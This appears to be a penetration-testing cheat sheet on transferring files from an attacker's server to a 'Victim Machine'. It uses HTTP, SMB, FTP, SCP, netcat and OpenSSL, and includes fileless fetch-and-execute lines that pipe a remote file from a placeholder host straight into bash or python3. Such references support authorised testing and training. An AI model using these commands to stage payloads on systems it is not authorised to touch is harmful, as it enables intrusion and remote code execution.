Some Commands Require SUDO Privileges

Some Operations May Be Blocked Due to Firewall Rules

Note

• Server - Basic Queries to setup a Running Server.
• Target - These Operations should be done on the Victim Machine.
• Interactive - We Log into a Remote Machine via RDP - SSH etc..
• Non Interactive - Commands run in their own Subshell and this Shell is not Interactive. Opens to Execute but closes Immediately.

HTTP Server

:: Python[3]
python3 -m http.server <PORT>

:: Python[2]
python -m SimpleHTTPServer <PORT>

:: PHP
php -S 0.0.0.0:<PORT>

:: Ruby
ruby -run -ehttpd . -p<PORT>

:: Requires [http-server] NPM Package
:: Simple JavaScript HTTP Server
http-server [path] [options]

SMB

Server

:: SMB-2: [-smb2support] 
:: Optional Arguments: [-user] [-password]
smbserver -smb2support "SHARE_NAME" "DIRECTORY" -user "Username" -password "Password"            

:: SMB Server without Authentication
smbserver -smb2support "SHARE_NAME" "DIRECTORY"

Target

:: Save Remote SMB File
smbget "smb://IP/SHARE/FILE.sh"

:: SMB Authentication
smbget "smb://IP/SHARE/FILE.sh" --user "username%password"

:: Authenticate & Upload
echo "put /FILE/PATH" | smbserver //SERVER/SHARE_NAME -U "username"

CURL - WGET

CURL

:: Save Remote File
curl -O "http://IP:PORT/FILE.sh"

:: Authentication [HTTP - HTTPS]
curl -k -O -u "username:password" "http://IP:PORT/FILE.sh"

:: FTP Download
curl -O "ftp://anonymous:anonymous@IP:PORT/FILE.sh" 

:: Fileless Method (Without Saving)
:: Best when Paired with Scripts [.sh]
curl https://<IP>/<File Name> | bash

WGET

:: Save Remote File
wget -O <OUTPUT> "http://IP:PORT/FILE.sh"

:: Authentication [HTTP - HTTPS]
wget --no-check-certificate --user "username" --password "password" "http://IP:PORT/FILE.sh"

:: FTP Download
wget -r "ftp://anonymous:anonymous@IP:PORT/FILE.sh"

:: Fileless Method (Without Saving)
:: Best when Paired with Scripts [.sh]
wget -qO- https://<IP>/<File Name> | python3

HTTP

:: Requires [httpie] Package
:: Save Remote File
http --download "http://IP:PORT/FILE.sh"

:: Authentication [HTTP - HTTPS]
http -a "username:password" --download --verify=no "http://IP:PORT/FILE.sh"

FTP

Server

:: Requires [pyftpdlib] Package 
:: Start The FTP Server
python3 -m pyftpdlib -p 21

Interactive

:: Interactive SHELL
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
ftp -p <IP> 21

Non Interactive

# Non Interactive SHELL
# Target
echo '#!/bin/bash' > FTP.sh
echo 'HOST=IP' >> FTP.sh
echo 'PORT=PORT' >> FTP.sh
echo 'USER=anonymous' >> FTP.sh
echo 'PASSWORD=anonymous' >> FTP.sh
echo 'ftp -p -inv $HOST $PORT << EOF' >> FTP.sh
echo 'user $USER $PASSWORD' >> FTP.sh
echo 'GET FILE' >> FTP.sh
echo 'bye' >> FTP.sh
echo 'EOF' >> FTP.sh

# Download the File
chmod +x FTP.sh; ./FTP.sh

SCP

:: Copy Remote File to the Local System
scp -P 22 machine@IP:/home/machine/FILE.sh "/home/user/OUTPUT.sh"

NETCAT

:: Receiver
nc -l -p <PORT> > <File Name>

:: Sender
nc -w 3 <IP> <PORT> < "Output"

OpenSSL

Server

:: Create Self Signed Certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

:: Start the Server
openssl s_server -quiet -accept <PORT> -cert certificate.pem -key key.pem < <File Name>

Target

:: Download file from the Remote Server
openssl s_client -connect <IP>:<PORT> -quiet > <Output>